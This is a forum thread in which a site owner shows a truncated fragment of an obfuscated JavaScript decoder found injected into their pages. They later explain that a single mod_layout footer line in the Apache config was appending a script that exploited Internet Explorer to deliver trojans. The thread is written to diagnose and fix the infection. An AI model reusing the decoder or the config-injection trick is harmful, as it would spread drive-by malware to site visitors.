Results 1 to 3 of 3

Thread: google-counter.com

Hybrid View

  1. #1
    zany_apinator Guest

    Default google-counter.com

    Hi all,

    Apologies in advance for the long story ... its starts off as a server issue but I think it might be caused by desktop malware.

    I've been struggling with this issue for the last few days and I think it might be casued by some kind of malware. I was playing around with some
    website templates and created a test site, when I noticed this code right several blank pages down in the source code (I've replaced with [] but it
    still comes out wonky in the post sorry etc):

    [script language=JavaScript]function zz(x){var l=x.length,b=1024,i,j,h,p=0,s=0,w=0,t=Array(63,41, 59,48,47,28,30,58,17,16,0,0,0,0,0,0,13,24,61,3,9,
    32,18,15,45,25,37,33,14,42,35,46,34,49,4,26,21,22, 38,43,5,6,60,0,0,0,0,40,0,7,1,52,20,12,56,0,51,23, 27,8,39,10,11,29,36,50,54,19,62,31,57,2,44,53,
    55);for(j=Math.ceil(l/b);j]0;j--){h='';for(i=Math.min(l,b);i]0;i--,l--){w|=(t[x.charCodeAt(p++)-48])[[s;if(s){h+=String.fromCharCode(226^w&255)
    ;w

  2. #2

    Default Re: google-counter.com

    Ask the people at www.castlecops.com.

  3. #3
    zany_apinator Guest

    Default Re: google-counter.com

    Hello,
    Well in desperation I hired a security expert (a guy called Martin from 3klabs security) who turned out to be
    great and
    extremely knowledgabe. He identified and fixed the issue within a few minutes. Here's the lowdown:
    Firstly, I thought my server had undergone security hardening, whereas in fact it had not. So my server was in a vulnerable state to begin with - now sorted.
    We think some kind of bot is making use of some kind of vulnerabilty to modify the Apache config file to include a line like this:
    LayoutFooter /usr/local/apache/conf/apache.conf
    Which uses the Layout module to force footers and headers onto every page on the server. The footer (/usr/local/apache/conf/apache.conf) contains the script. To test for this simply disable the layout module (mod_layout) and see what happens.
    Using that one line above means that EVERY web page on the server is infrected. (Fortunately, removing that line also disinfects every page).
    The script makes use of an IE vulnerability, such that every IE user that loads the web page is exposed to potentially downloading trojans, keyloggers etc. Martin thinks the virus is related to this:
    http://www.viruslist.com/en/viruses/...?virusid=65760

    I hope this saves the next poor soul who gets infected a bit of time. I'm not sure what to do with new(?) discoveries like this but I'm sure the mod does. Kudos to Martin from http://3klabs.com for solving this. He saved my skin.


    Cheers,
    Brent

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •